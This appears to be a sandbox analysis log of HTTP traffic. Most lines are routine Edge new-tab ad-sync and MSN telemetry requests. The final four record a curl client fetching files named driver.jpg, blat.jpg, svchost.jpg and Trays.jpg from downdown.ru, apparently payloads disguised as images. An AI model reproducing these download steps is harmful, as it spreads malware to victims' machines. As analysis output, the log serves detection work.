    Source: global trafficHTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79ce19f4-5d97-4e79-bde7-86678df03e68; ai_session=4GQ3I+JGTtsRdJFn4pBfwj|1736578471570|1736578471570; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 150sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79ce19f4-5d97-4e79-bde7-86678df03e68; ai_session=4GQ3I+JGTtsRdJFn4pBfwj|1736578471570|1736578471570; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync?ssp=msn&id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=13e49033-643c-448b-9c06-1bea332fabbe&ii=1&c=11891600591998607670&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /driver.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
    Source: global trafficHTTP traffic detected: GET /blat.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
    Source: global trafficHTTP traffic detected: GET /svchost.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
    Source: global trafficHTTP traffic detected: GET /Trays.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
